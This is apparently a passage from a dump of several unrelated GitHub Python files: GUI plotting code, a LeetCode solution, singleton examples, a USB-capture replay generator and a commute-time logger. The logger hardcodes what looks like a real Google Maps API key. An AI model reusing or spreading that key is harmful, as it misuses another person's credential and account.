working image\n update_current = kwargs.get('update_current', False)\n if update_current == True:\n self.shown_ascurrent(img, current_channel)\n\n def clear_showobject(self, drawn_object, **kwargs):\n\n # Get image axis where to display\n img_axis = kwargs.get('axis_img', self.axis_img)\n # Get label of old artist objects\n label_old = kwargs.get('label_old', 'vesicle')\n \n # Clear old patch objects\n if label_old == 'all':\n old_objects = [x for x in img_axis.patches]\n old_text = [x for x in img_axis.texts]\n else:\n old_objects = [x for x in img_axis.patches if label_old == x.get_label()]\n old_text = [x for x in img_axis.texts if label_old in x.get_label()]\n\n for patch in old_objects:\n img_axis.patches.remove(patch)\n for s in old_text:\n img_axis.texts.remove(s)\n\n # If the drawn_object is 
not none, it adds the artists\n if drawn_object is not None: \n # Draw text with information or the new artist objects\n if drawn_object[0] == 'text_info':\n ObjectDisplay.text_info(drawn_object[1], img_axis, **kwargs)\n else:\n ObjectDisplay.show_object(drawn_object, img_axis, **kwargs)\n \n # Draw canvas\n self.canvas.draw()\n \n def overlay_mask(self, mask, **kwargs):\n \n # Get colormap and alpha options\n colormap = kwargs.get('colormap', 'inferno')\n c_alpha = kwargs.get('alpha', 0.5)\n\n # Get option to remove old mask\n remove_old = kwargs.get('remove_old', False)\n if remove_old is True:\n try:\n self.s_mask.remove()\n except (AttributeError, ValueError) as e:\n pass\n\n # Show mask on axis without clearing it\n self.s_mask = self.axis_img.imshow(mask, alpha = c_alpha, cmap = colormap, zorder = 10)\n\n # Draw canvas\n self.canvas.draw()\n\n def clear_showscatter(self, scatter_points, **kwargs):\n\n # Get image axis where to display\n img_axis = kwargs.get('axis_img', self.axis_img)\n\n # Get label of old artist objects\n label_old = kwargs.get('label_old', 'scatter')\n # Get label of new artist objects\n label_new = kwargs.get('label', 'scatter')\n\n # Get option to remove old objects\n remove_old = kwargs.get('remove_old', False)\n\n # Get color for the scatter points\n scolor = kwargs.get('color', 'blue')\n\n # clear old objects if required\n if remove_old is True:\n old_scatter = [x for x in img_axis.collections if label_old in x.get_label()]\n for s in old_scatter:\n img_axis.collections.remove(s)\n \n # If the scatter points is not none, add the collection with the desired label\n if scatter_points is not None:\n img_axis.scatter(scatter_points[0], scatter_points[1], s = 1, marker = '.',\n c = scolor, label = label_new)\n\n # Draw canvas\n self.canvas.draw()\n \n def show_scattermask(self, mask, **kwargs):\n\n # Get the coordinates of the mask\n ye, xe = np.where(mask)\n\n # If there is an offset, add it to the coordinates\n offset_points = kwargs.get('offset', [0,0])\n xe = xe + offset_points[0]\n ye = ye + offset_points[1]\n\n # Get the color for hte points drawn\n point_color = kwargs.get('color', 'orange')\n # By default remove the previous scatter plot\n remove_old = kwargs.get('remove_old', True)\n # Get label to add\n label_scatter =kwargs.get('label', 'scatter')\n\n # Remove old scatter plot if desired\n if remove_old is True:\n try:\n self.s_smask.remove()\n except (AttributeError, ValueError):\n pass\n\n # Show the points overlayed\n self.s_smask = self.axis_img.scatter(xe, ye, s = 1, marker = '.', c = point_color, label = label_scatter)\n\n # Draw canvas\n self.canvas.draw()\n\n def shown_ascurrent(self, img, channel):\n\n if (channel == 0) or (self.controller.appdata_imagecurrent.ndim == 2):\n self.controller.appdata_imagecurrent = 1*img\n else:\n self.controller.appdata_imagecurrent[:,:,channel - 1] = 1*img\n\n def bind_onpick(self, **kwargs):\n\n # Get additional arguments\n delete_on_disconnect = kwargs.get('delete_on_disconnect', True)\n off_color = kwargs.get('off_color', 'yellow')\n on_color = kwargs.get('on_color', 'skyblue')\n custom_callback = kwargs.get('custom_callback', False)\n\n # Check if the canvas has been connected to the pick_event\n try:\n self.canvas.mpl_disconnect(self.cid_pick)\n except AttributeError:\n if custom_callback == False:\n # Connect the mpl with the pick event#\n # If the callback is custom, the mpl is connected outside of this function\n self.cid_pick = self.canvas.mpl_connect('pick_event', lambda event: 
self.select_object(event))\n # Initialise selected objects variable\n self.object_selected = []\n # Configure all the text objects in the canvas to be pickable\n for s in self.axis_img.texts:\n s.set(picker = 20, color = on_color)\n state_mpl = 'connected'\n else:\n del self.cid_pick\n if delete_on_disconnect == True: \n del self.object_selected\n for s in self.axis_img.texts:\n s.set(picker = False, color = off_color)\n state_mpl = 'disconnected'\n\n self.canvas.draw()\n\n return state_mpl\n\n def bind_right(self, input_data, **kwargs):\n \n # Get the option to add a custom callback\n custom_callback = kwargs.get('custom_callback', False)\n\n # Check if the canvas has been connected to the right-click event and disconnect\n try:\n self.canvas.mpl_disconnect(self.cid_right)\n except AttributeError:\n if custom_callback == False:\n # If no custom callback is needed, connect the mpl with the right click event \n self.cid_right = self.canvas.mpl_connect('button_press_event', lambda event: self.delete_selected(event, input_data, **kwargs))\n else:\n del self.cid_right\n\n def select_object(self, event,**kwargs):\n\n # Only proceed if the event was triggered with the left click\n if event.mouseevent.button == 1:\n # Get the artist that was selected and highlight it\n selected_object = event.artist\n selected_object.set(color = 'deeppink')\n # Ge the text, it should be equal to the vesicle id\n selected_id = int(selected_object.get_text()) - 1\n # Add selected id to the variable of selected objects\n self.object_selected.append(selected_id)\n \n # Update canvas\n self.canvas.draw()\n\n def delete_selected(self, event, input_data, **kwargs):\n\n if event.button == 3:\n # Keep only the unique elements of the object selection and clear original variable\n selected_ids = list(set(self.object_selected))\n self.object_selected = []\n\n # Delete the selected objects from input data (input data is numpy array)\n clean_data = np.delete(input_data[1], selected_ids, axis = 0)\n input_data[1] = clean_data\n\n # Delete the selected objects from the mask data\n mask_data = kwargs.get('input_mask', None)\n if mask_data is not None:\n for s_ind in selected_ids:\n mask_data[mask_data == (s_ind+1)] = 0\n for ic, ilabel in enumerate(np.unique(mask_data.flatten())[1:]):\n mask_data[mask_data == ilabel] = ic+1\n self.s_mask.remove()\n self.overlay_mask(mask_data, alpha = 0.3)\n # Update canvas with the clean results\n self.clear_showobject(input_data, textcolor = 'skyblue', pick = 20)\n\nclass CanvasEmbeddedPlot():\n\n def __init__(self, frame_container, controller = None, **kwargs):\n self.controller = controller \n\n # Configure layout of frame\n frame_container.columnconfigure(0, weight = 1)\n frame_container.rowconfigure(1, weight = 1)\n\n # Initialize figure and subplot area\n fig = Figure()\n axis_plot = fig.add_subplot(111)\n fig.set_tight_layout(True)\n # Set fontsize as 'small' if required\n small_font = kwargs.get('small_font', False)\n if small_font is True:\n for item in ([axis_plot.xaxis.label, axis_plot.yaxis.label] + \n axis_plot.get_xticklabels() + axis_plot.get_yticklabels()):\n item.set_fontsize(8)\n\n\n # Add canvas to the figure wihtin the frame\n canvas = FigureCanvasTkAgg(fig, master = frame_container)\n frame_canvas = canvas.get_tk_widget()\n frame_canvas.grid(row = 1, column = 0, sticky = 'nsew')\n\n # Add matplotlib toolbar to the figure within the frame\n frame_itoolbar = ttk.Frame(frame_container)\n frame_itoolbar.grid(row = 0, column = 0, sticky = 'nse')\n t_plot = 
NavigationToolbar2Tk(canvas, frame_itoolbar)\n\n # Store canvas and axis plot in object\n self.canvas = canvas\n self.axis_plot = axis_plot\n\n def plot_histogram(self, bin_data, counts, **kwargs):\n\n # Get data label\n data_label = kwargs.get('data_label', 'Data')\n\n # Calculate the appropriate bar width\n bar_width = 0.9*(bin_data[1]-bin_data[0])\n\n # Clear axis first\n self.axis_plot.cla()\n\n # Plot the histogram with the barplot\n self.axis_plot.bar(bin_data, counts, \n edgecolor = 'slategray', facecolor = 'lightsteelblue', linewidth = 1,\n label = data_label, width = bar_width)\n\n # Add the axis labels\n x_label = kwargs.get('x_label', 'x')\n y_label = kwargs.get('y_label', 'counts')\n self.axis_plot.set_xlabel(x_label)\n self.axis_plot.set_ylabel(y_label)\n\n # Set the axis limits\n self.axis_plot.set_xlim([0, bin_data[-1]+ 2*bar_width])\n\n # Add the legend\n self.axis_plot.legend()\n \n # Draw canvas\n self.canvas.draw()\n\n def plot_fit(self, x, y_fit, fit_param_dict):\n\n # Plot the fitted data as a curve\n self.axis_plot.plot(x, y_fit, c = 'mediumvioletred', lw = 2, label = 'Fit')\n # Redraw legend\n self.axis_plot.legend()\n\n # Add text with parameters of the fit\n text_string = ''\n for key, value in fit_param_dict.items():\n try:\n text_string = f'{text_string}\\n{key}: {value[0]:.1f} +/- {value[1]:.2f}'\n except TypeError:\n text_string = f'{text_string}\\n{key}: {value:.1f}'\n \n self.axis_plot.text(0.02, 0.95, text_string, c = 'mediumvioletred', size = 9,\n ha = 'left', va = 'center', transform = self.axis_plot.transAxes)\n\n # Configure y_axis to cover slightly more than the maximum and the legend can fit nicely\n self.axis_plot.set_ylim([0, 1.3*np.max(y_fit)])\n\n # Draw canvas\n self.canvas.draw()\n\n def plot_line(self, x, y, **kwargs):\n\n # get label to be able to remove objects\n label = kwargs.get('label', 'line')\n # Get option to dim the old profiles\n dim_old = kwargs.get('dim_old', True)\n\n # Get x and y labels\n xlabel = kwargs.get('xlabel', 'x')\n ylabel = kwargs.get('ylabel', 'y')\n\n # Get color of the line and alpha value\n cline = kwargs.get('color', 'steelblue')\n alpha_line = kwargs.get('alpha', 1)\n\n # Get text to label the curves if required\n textlabel = kwargs.get('textlabel', None)\n \n # Set a higher transparency for older lines\n if dim_old is True:\n for line in self.axis_plot.lines:\n line.set(alpha = 0.2)\n for s in self.axis_plot.texts:\n s.set(alpha = 0.3)\n \n # Plot the data as a 2D curve\n self.axis_plot.plot(x, y, c = cline, lw = 1, label = label, marker = '.', ms = 1, alpha = alpha_line)\n # Add a text label to the curve, if required\n if textlabel is not None:\n self.axis_plot.text(x[-1], y[-1], s = textlabel, size = 6, color = cline)\n # Set the x and y axis labels\n self.axis_plot.set_xlabel(xlabel)\n self.axis_plot.set_ylabel(ylabel)\n \n # Draw canas\n self.canvas.draw()\n \n def plot_secline(self, x, y, **kwargs):\n\n if not hasattr(self, 'axis_ploty2'):\n # Add the secondary axis, if needed\n self.axis_ploty2 = self.axis_plot.twinx()\n \n # get label to be able to remove objects\n label = kwargs.get('label', 'secline')\n # Get option to dim old results\n dim_old = kwargs.get('dim_old', True)\n\n # Get y labels\n ylabel = kwargs.get('ylabel', 'y')\n # Get color of the line\n cline = kwargs.get('color', 'slategray')\n\n # Get text to label the curves if required\n textlabel = kwargs.get('textlabel', None)\n\n # Set a higher transparency for older lines\n if dim_old is True:\n for line in self.axis_ploty2.lines:\n 
line.set(alpha = 0.2)\n for s in self.axis_ploty2.texts:\n s.set(alpha = 0.3)\n \n # Plot the data as a 2D curve in the secondary y-axis\n self.axis_ploty2.plot(x, y, c = cline, lw = 1, label = label, alpha = 0.5)\n # Add a text label to the curve, if required\n if textlabel is not None:\n self.axis_ploty2.text(x[0], y[0], s = textlabel, size = 6, color = cline)\n # Set the x and y axis labels\n self.axis_ploty2.set_ylabel(ylabel)\n \n # Draw canas\n self.canvas.draw()\n\n \n\n","repo_name":"DisGUVery/disguvery","sub_path":"disguvery/ui_canvas.py","file_name":"ui_canvas.py","file_ext":"py","file_size_in_byte":17412,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"16"} +{"seq_id":"31301856824","text":"class Solution:\n def plusOne(self, digits: List[int]) -> List[int]:\n \"\"\"\n Runtime Complexity: O(n)\n Space Complexity: O(n)\n Algorithm: Turn digits into number, add it by 1, convert number to string, pass in each digit to new array\n \"\"\"\n number = 0\n\n for i in range(len(digits)):\n number += digits[i] * 10**(len(digits)-(i+1))\n \n number += 1\n\n number = str(number)\n\n new_digits = []\n\n for i in range(len(number)):\n new_digits.append(int(number[i]))\n\n return new_digits","repo_name":"abdulolagunju19/Leetcode-Solutions","sub_path":"Abdul solutions/plus_one.py","file_name":"plus_one.py","file_ext":"py","file_size_in_byte":583,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"27555144214","text":"from graphics import *\nimport time\n\ndef main():\n win=GraphWin(\"my first window\", 500, 300)\n win.setBackground(\"blue\")\n\n ptA=Point(50,100)\n cir =Circle(ptA, 20)\n cir.setFill(\"yellow\")\n cir.draw(win)\n for i in range(15):\n time.sleep(.5)\n cir.move(10,-15)\n time.sleep(.5)\n cir.move(10,15)\n","repo_name":"mgould1799/Intro-To-Python","sub_path":"CSCI220/random/movecir.py","file_name":"movecir.py","file_ext":"py","file_size_in_byte":335,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"69839393928","text":"from PyQt5.QtGui import *\nfrom PyQt5.QtCore import *\nfrom PyQt5.QtWidgets import *\n\nimport sys\n\nclass testLink(QDialog):\n def __init__(self):\n super(testLink, self).__init__()\n self.initUI() \n self.button_test.clicked.connect(lambda:self.test())\n\n def initUI(self):\n self.img = QLabel(self)\n self.img.setFixedSize(300,160)\n # qimg = QImage(img,200,100,QImage.Format_RGB888)\n # self.img.setPixmap(QPixmap.fromImage(qimg))\n\n self.onside_cam = QLabel(self)\n self.onside_cam.setFixedSize(100,50)\n self.onside_cam.move(10,10)\n self.onside_cam.setText(\"正面相机\")\n self.onside_cam.setFont(QFont('Times',14))\n\n self.onside_sure = QFrame(self)\n self.onside_sure.setFixedSize(30,30)\n self.onside_sure.move(110,20)\n self.onside_sure.setStyleSheet(\"background-color:green;\")\n\n self.leftside_cam = QLabel(self)\n self.leftside_cam.setFixedSize(100,50)\n self.leftside_cam.move(10,60)\n self.leftside_cam.setText(\"左面相机\")\n self.leftside_cam.setFont(QFont('Times',14))\n\n self.leftside_sure = QFrame(self)\n self.leftside_sure.setFixedSize(30,30)\n self.leftside_sure.move(110,70)\n self.leftside_sure.setStyleSheet(\"background-color:green;\")\n\n self.rightside_cam = QLabel(self)\n self.rightside_cam.setFixedSize(100,50)\n self.rightside_cam.move(150,10)\n self.rightside_cam.setText(\"右面相机\")\n self.rightside_cam.setFont(QFont('Times',14))\n\n self.rightside_sure = QFrame(self)\n 
self.rightside_sure.setFixedSize(30,30)\n self.rightside_sure.move(250,20)\n self.rightside_sure.setStyleSheet(\"background-color:green;\")\n\n self.plc = QLabel(self)\n self.plc.setFixedSize(100,50)\n self.plc.move(150,60)\n self.plc.setText(\"PLC控制器\")\n self.plc.setFont(QFont('Times',14))\n\n self.plc_sure = QFrame(self)\n self.plc_sure.setFixedSize(30,30)\n self.plc_sure.move(250,70)\n self.plc_sure.setStyleSheet(\"background-color:green;\")\n\n self.button_test = QPushButton(self)\n self.button_test.setText(\"测试连接性\")\n self.button_test.setFont(QFont(\"Times\", 12))\n self.button_test.setFixedSize(100, 30)\n self.button_test.move(110, 120)\n def test(self):\n print(\"111test\")\nif __name__ == '__main__':\n app = QApplication(sys.argv)\n work = showBig()\n work.show()\n # work.showFullScreen()\n sys.exit(app.exec_())\n","repo_name":"ty9071/suzly2","sub_path":"test_link.py","file_name":"test_link.py","file_ext":"py","file_size_in_byte":2550,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"8769671884","text":"'''\n单例是一种设计模式,应用该模式的类只会生成一个实例。\n\n单例模式保证了在程序的不同位置都可以且仅可以取到同一个对象实例:如果实例不存在,会创建一个实例;如果已存在就会返回这个实例。因为单例是一个类,所以你也可以为其提供相应的操作方法,以便于对这个实例进行管理。\n\n举个例子来说,比如你开发一款游戏软件,游戏中需要有“场景管理器”这样一种东西,用来管理游戏场景的切换、资源载入、网络连接等等任务。这个管理器需要有多种方法和属性,在代码中很多地方会被调用,且被调用的必须是同一个管理器,否则既容易产生冲突,也会浪费资源。这种情况下,单例模式就是一个很好的实现方法。\n'''\n## M1\nimport threading\n\nclass Singleton(object):\n instance = None\n\n def __new__(cls, *args, **kwargs):\n if cls.instance is None:\n cls.instance = super().__new__(cls)\n return cls.instance\n\n\ndef test():\n single = Singleton()\n print(single)\n\n\nfor i in range(5):\n t = threading.Thread(target=test)\n t.start()\n\n\n## M2\nimport threading\n\n\ndef singleton(cls):\n instances = {}\n\n def _singleton(*args, **kwargs):\n if cls not in instances:\n instances[cls] = cls(*args, **kwargs)\n return instances[cls]\n\n return _singleton\n\n\n@singleton\ndef test(a, b):\n return None\n\n\ndef test1():\n print(test)\n\n\nfor i in range(5):\n t = threading.Thread(target=test1)\n t.start()\n\n\n## M3\ndef singleton(cls):\n _instance = {}\n\n def inner():\n if cls not in _instance:\n _instance[cls] = cls()\n return _instance[cls]\n return inner\n \n@singleton\nclass Cls(object):\n def __init__(self):\n pass\n\ncls1 = Cls()\ncls2 = Cls()\nprint(id(cls1) == id(cls2))\n\n\n## M4\nclass Singleton(object):\n def __init__(self, cls):\n self._cls = cls\n self._instance = {}\n def __call__(self):\n if self._cls not in self._instance:\n self._instance[self._cls] = self._cls()\n return self._instance[self._cls]\n\n@Singleton\nclass Cls2(object):\n def __init__(self):\n pass\n\ncls1 = Cls2()\ncls2 = Cls2()\nprint(id(cls1) == id(cls2))\n\nclass Cls3():\n pass\n\nCls3 = Singleton(Cls3)\ncls3 = Cls3()\ncls4 = Cls3()\nprint(id(cls3) == id(cls4))\n","repo_name":"lynn840429/Python_Learning-InterviewPython","sub_path":"code_imp/singleton.py","file_name":"singleton.py","file_ext":"py","file_size_in_byte":2391,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"44442896971","text":"import feedparser as fp\nfrom textblob import TextBlob as tb\nimport re\n\n# feed from CNN\nworldNews = fp.parse('http://rss.cnn.com/rss/edition_world.rss')\n\n# number of stories\nnumStories = len(worldNews['entries'])\n\n# list to contain polarity of stories\nfinal = []\n\nfor i in range(0,numStories):\n # initial description\n descInit = worldNews['entries'][i]['summary_detail']['value']\n # cleaning out the img 
tag\n descClean = re.sub('\\ 16:\n ret += '\\n'\n for i in range(len(buff)):\n if i % 16 == 0:\n if i != 0:\n ret += '\" \\\\\\n'\n if len(buff) <= 16:\n ret += 'b\"'\n if not terse or len(buff) > 16:\n ret += '%s\"' % prefix\n\n ret += \"\\\\x%02X\" % (buff[i], )\n return ret + '\"'\n\n\ndef str2hexline(buff):\n if len(buff) == 0:\n return '\"\"'\n buff = bytearray(buff)\n ret = ''\n for i in range(len(buff)):\n ret += \"\\\\x%02X\" % (buff[i], )\n return '\"' + ret + '\"'\n\n\npi = None\nps = None\n\nfout = sys.stdout\n\nprefix = ' ' * 8\nindent = ''\nline_buff = []\n\n\ndef lines_clear():\n del line_buff[:]\n\n\ndef lines_commit():\n for line in line_buff:\n fout.write(line + '\\n')\n del line_buff[:]\n\n\ndef line(s):\n line_buff.append('%s%s' % (indent, s))\n\n\ndef comment(s):\n line(\"# \" + s)\n\n\ndef indentP():\n global indent\n indent += ' '\n\n\ndef indentN():\n global indent\n indent = indent[4:]\n\n\ndumb = False\nomit_ro = True\n\n\ndef emit_ro():\n '''Return true if keeping ro. Otherwise clear line buffer and return false'''\n if omit_ro:\n lines_clear()\n return False\n else:\n return False\n\n\ndef bin2hexarg(data):\n ret = str2hex(data, prefix=prefix)\n if len(data) > 16:\n ret += '\\n%s' % prefix\n return ret\n\n\ndef pkt_strip(p):\n pprefix = ord(p[0])\n '''\n if pprefix != 0x08:\n #raise Exception(\"Bad prefix\")\n line('# WARNING: unexpected prefix')\n '''\n size = (ord(p[-1]) << 8) | ord(p[-2])\n # Exact match\n if size == len(p) - 3:\n return (p[1:-2], False, pprefix)\n # Extra data\n # So far this is always 0 (should verify?)\n elif size < len(p) - 3:\n # TODO: verify 0 padding\n return (p[1:1 + size], True, pprefix)\n # Not supposed to happen\n else:\n print(bin2hexarg(p))\n print(size)\n raise Exception(\"Bad size\")\n\n\nclass CmpFail(Exception):\n pass\n\n\ndef cmp_buff(exp, act):\n if len(exp) != len(act):\n raise CmpFail(\"Exp: %d, act: %d\" % (len(exp), len(act)))\n\n\ndef cmp_mask(exp, mask, act):\n if len(exp) != len(act):\n hexdump(exp, indent=' ', label='expected')\n hexdump(act, indent=' ', label='actual')\n raise CmpFail(\"Exp: %d, act: %d\" % (len(exp), len(act)))\n if len(exp) != len(mask):\n hexdump(exp, indent=' ', label='expected')\n hexdump(act, indent=' ', label='mask')\n raise CmpFail(\"Exp: %d, mask: %d\" % (len(exp), len(mask)))\n for expc, actc in zip(exp, act):\n if mask == '\\xFF' and expc != actc:\n hexdump(exp, indent=' ', label='expected')\n hexdump(act, indent=' ', label='actual')\n raise CmpFail(\"Exp: 0x%02X, act: 0x%02X\" % (ord(exp), ord(actc)))\n\n\ndef peekp():\n return nextp()[1]\n\n\nclass OutOfPackets(Exception):\n pass\n\n\ndef nextp():\n ppi = pi + 1\n while True:\n if ppi >= len(ps):\n raise OutOfPackets(\"Out of packets, started packet %d, at %d\" %\n (pi, ppi))\n p = ps[ppi]\n if p['type'] != 'comment':\n return ppi, p\n ppi = ppi + 1\n\n\ndef next_bulk1(cmd):\n global pi\n\n pi, pw = nextp()\n assert pw['type'] == 'bulkWrite', pw['type']\n assert pw['endp'] == 0x01\n assert binascii.unhexlify(pw['data']) == cmd\n\n pi, pr = nextp()\n assert pr['type'] == 'bulkRead'\n assert pr['endp'] == 0x83\n return binascii.unhexlify(pr['data'])\n\n\ndef pack32ub(n):\n return struct.pack('>I', n)\n\n\ndef pack32ul(n):\n return struct.pack('H', n)\n\n\ndef pack16ul(n):\n return struct.pack('I', buff)[0]\n\n\ndef unpack32ul(buff):\n return struct.unpack('H', buff)[0]\n\n\ndef unpack16ul(buff):\n return struct.unpack('II\", pwdata[0:8])\n payload = pwdata[8:]\n assert len(payload) == length\n\n if opcode == 0x0F:\n assert len(payload) 
== 0\n line(\"abort_stream(dev)\")\n return\n\n pi_next, pr = nextp()\n assert pr['type'] == 'bulkRead'\n if pr['endp'] != 0x83:\n comment(\"WARNING: unexpected read endpoint\")\n basic_write()\n return\n pi = pi_next\n\n prdata = binascii.unhexlify(pr['data'])\n\n # opcode 0 is known, but its boring\n if opcode == 1:\n assert length == 0\n # line(\"response = %s\" % str2hex(prdata, prefix=\" \"))\n vendor, model, ver, sn = ham.parse_info1(prdata)\n comment(\"%s, %s, %s, %s\" % (vendor, model, ver, sn))\n line(\"vendor, model, ver, sn = get_info1(dev)\")\n elif opcode == 2:\n assert length == 0\n width, height = ham.parse_info2(prdata)\n comment(\"0x%04X, 0x%04X\" % (width, height))\n line(\"width, height = get_info2(dev)\")\n elif opcode == 4:\n assert length == 0\n width, height = struct.unpack('>II', prdata)\n comment(\"0x%04X, 0x%04X\" % (width, height))\n line(\"width, height = get_roi_wh(dev)\")\n elif opcode == 9:\n assert prdata == b\"\\x01\"\n prefix = \"\\x00\\x01\\x00\\x00\\x00\\x00\"\n width, height = struct.unpack(\">HH\", payload[len(prefix):])\n line(\"set_roi_wh(dev, 0x%04X, 0x%04X)\" % (width, height))\n elif opcode == 0x2D:\n assert prdata == b\"\\x00\"\n op = struct.unpack(\">H\", payload)[0]\n if op == 1:\n line(\"trig_int(dev)\")\n elif op == 5:\n line(\"trig_sync(dev)\")\n else:\n line(\"trig_n(dev, %u)\" % op)\n elif opcode == 0x1F:\n exp = unpack32ub(prdata)\n comment(\"%u ms\" % exp)\n line(\"exposure = get_exp(dev)\")\n elif opcode == 0x20:\n assert prdata == b\"\\x01\"\n exp = unpack32ub(payload)\n line(\"set_exp(dev, %u)\" % exp)\n # XXX: there is a verify after this we should ideally eat\n elif opcode == 0x0E:\n assert payload == b\"\\x01\"\n assert prdata == b\"\\x01\"\n line(\"force_trig(dev)\")\n else:\n pktl, pkth = pw['packn']\n assert_msg = '\"packet %s/%s\"' % (pktl, pkth)\n response = bin2hexarg(prdata)\n\n # line('validate_read(%s, bulk1(dev, %s), %s)' % (response, out, desc))\n payload_arg = \"\"\n if len(payload):\n out = bin2hexarg(payload)\n payload_arg = \", payload=%s\" % out\n line(\"validate_cmd1(dev, 0x%02X, %s, msg=%s%s)\" %\n (opcode, response, assert_msg, payload_arg))\n\n\ndef dump(fin, source_str, save=False):\n global pi\n global ps\n\n comment(\"Generated from %s\" % source_str)\n j = json.load(open(fin))\n pi = 0\n ps = j['data']\n ps = list(filter(lambda p: p['type'] != 'comment', ps))\n\n def eat_packet(type=None, req=None, val=None, ind=None, length=None):\n p = ps[pi + 1]\n\n if type and type != p['type']:\n raise Exception()\n if req and type != p['req']:\n raise Exception()\n if val and type != p['val']:\n raise Exception()\n if ind and type != p['ind']:\n raise Exception()\n if length and length != p['len']:\n raise Exception()\n\n return pi + 1\n\n im_bytes = None\n while pi < len(ps):\n is_comment = False\n p = ps[pi]\n if p['type'] == 'comment':\n line('# %s' % p['v'])\n is_comment = True\n elif p['type'] == 'bulkWrite':\n bulk_write(p)\n elif p['type'] == 'bulkRead':\n # print(\"# WARNING: dropping bulkRead\")\n endpoint = p['endp']\n if p[\"data\"] is None:\n buff = None\n else:\n buff = binascii.unhexlify(p[\"data\"])\n assert endpoint == 0x82\n sync_word = ham.is_sync(buff, verbose=False)\n sync_str = \"NONE\"\n if sync_word:\n if sync_word == ham.MSG_BEGIN:\n im_bytes = 0\n elif sync_word == ham.MSG_END:\n comment(\"Final bytes: %u\" % im_bytes)\n comment(\"MSG_END: %s\" % binascii.hexlify(buff))\n im_bytes = None\n sync_str = ham.sync2str(sync_word)\n elif im_bytes is None:\n comment(\"WARNING: data without image\")\n 
im_bytes = len(buff)\n else:\n im_bytes += len(buff)\n comment(\n \"bulkRead(0x%02X): req %u, got %u bytes w/ sync %s, %s bytes total\"\n % (endpoint, p['len'], len(buff), sync_str, im_bytes))\n else:\n raise Exception(\"%u unknown type: %s\" % (pi, p['type']))\n if not is_comment:\n lines_commit()\n pi += 1\n\n lines_commit()\n indentN()\n lines_commit()\n\n\nif __name__ == \"__main__\":\n import argparse\n\n parser = argparse.ArgumentParser(description='')\n parser.add_argument('--dumb', action='store_true')\n add_bool_arg(parser,\n '--omit-ro',\n default=True,\n help='Omit read only requests (ex: get SM info)')\n parser.add_argument('--big-thresh', type=int, default=255)\n parser.add_argument('--usbrply', default='')\n parser.add_argument('-w', action='store_true', help='Write python file')\n parser.add_argument('fin')\n args = parser.parse_args()\n\n source_str = args.fin\n if args.fin.find('.cap') >= 0 or args.fin.find(\n '.pcapng') >= 0 or args.fin.find('.pcap') >= 0:\n fin = '/tmp/scrape.json'\n cmd = 'usbrply --no-packet-numbers --no-setup --device-hi %s -j %s >%s' % (\n args.usbrply, args.fin, fin)\n try:\n subprocess.check_call(cmd, shell=True)\n except:\n print(\"Failed to process %s\" % args.fin)\n raise\n else:\n fin = args.fin\n\n if args.w:\n filename, file_extension = os.path.splitext(args.fin)\n fnout = filename + '.py'\n print('Selected output file %s' % fnout)\n assert fnout != fin, fin\n fout = open(fnout, 'w')\n\n dumb = args.dumb\n omit_ro = args.omit_ro\n dump(fin, source_str)\n","repo_name":"JohnDMcMaster/faxitron","sub_path":"usbrply.py","file_name":"usbrply.py","file_ext":"py","file_size_in_byte":11276,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"16"} +{"seq_id":"8609775408","text":"import schedule\nimport time\nimport datetime\nimport threading\nimport os\nfrom googlemaps import Client\nfrom time import gmtime, strftime\n\ndef partial(func, *args, **kwargs):\n\tdef f(*args_rest, **kwargs_rest):\n\t\tkw = kwargs.copy()\n\t\tkw.update(kwargs_rest)\n\t\treturn func(*(args + args_rest), **kw) \n\treturn f\n\ndef format_time(hours, minutes):\n\treturn str(hours)+\":\"+str(minutes)+\"0\"\n\ndef find_traffic(hours, minutes):\n\taddresses = []\n\tgmaps = Client('AIzaSyCaQlauoQ1njrABzhVCliY49DaByZNYkTY')\n\tcassie_work = '3237 S 16th St, Milwaukee, WI 53215'\n\tjoey_work = '1550 Innovation Way, Hartford, WI 53027'\n\twith open('address.txt') as f:\n\t\taddresses = f.readlines()\n\tfile = open('times.csv', 'a')\n\tday = datetime.datetime.today().weekday()\n\tfor addr_newline in addresses:\n\t\taddr = addr_newline.rstrip()\n\t\tdirections_cassie = None\n\t\tdirections_joey = None\n\t\tif(hours < 8):\n\t\t\tdirections_cassie = gmaps.directions(addr, cassie_work)\n\t\t\tdirections_joey = gmaps.directions(addr, joey_work)\n\t\telse:\n\t\t\tdirections_cassie = gmaps.directions(cassie_work, addr)\n\t\t\tdirections_joey = gmaps.directions(joey_work, addr)\n\t\tfile.write(str(addr)+','+format_time(hours,minutes)+',Cassie,'+str(directions_cassie[0]['legs'][0]['duration']['value'])+',Joey,'+str(directions_joey[0]['legs'][0]['duration']['value'])+','+str(day)+'\\n')\n\tfile.close()\n\ndef run_threaded(job_func):\n\tjob_thread = threading.Thread(target=job_func)\n\tjob_thread.start()\n\ndef test_job():\n\tprint(\"TEST TEST TEST\")\n\n# def upload_file():\n# \ttimes = []\n# \twith open('times.csv') as f:\n# \t\ttimes = f.readlines()\n# \tfor time in times:\n# \t\ttime = time.rstrip()\n# \t\ttime = time.split(',')\n# \t\tdata = 
{'address':time[0]+time[1]+time[2], 'time':time[3], 'Cassie':time[5], 'Joey':time[7]}\n# \t\tr = requests.post('localhost:8000', data=data)\n\ndef schedule_tasks():\n\thours = 5\n\tminutes = 0\n\tfor y in range(0,6):\n\t\tfor x in range(0,6):\n\t\t\tp = partial(find_traffic, hours, minutes)\n\t\t\tschedule.every().day.at(format_time(hours, minutes)).do(p)\n\t\t\tminutes += 1\n\t\tminutes = 0\n\t\tif(y == 2):\n\t\t\thours += 7\n\t\telse:\n\t\t\thours += 1\n\t#schedule.every().day.at('9:00').do(upload_file())\n\t#schedule.every().day.at('18:00').do(upload_file())\n\ndef schedule_tasks_test():\n\thours = 18\n\tminutes = 0\n\tfor y in range(0,2):\n\t\tfor x in range(0,1):\n\t\t\tp = partial(find_traffic, hours, minutes)\n\t\t\tschedule.every().day.at(format_time(hours, minutes)).do(p)\n\t\t\tminutes += 1\n\t\tminutes = 0\n\t\thours += 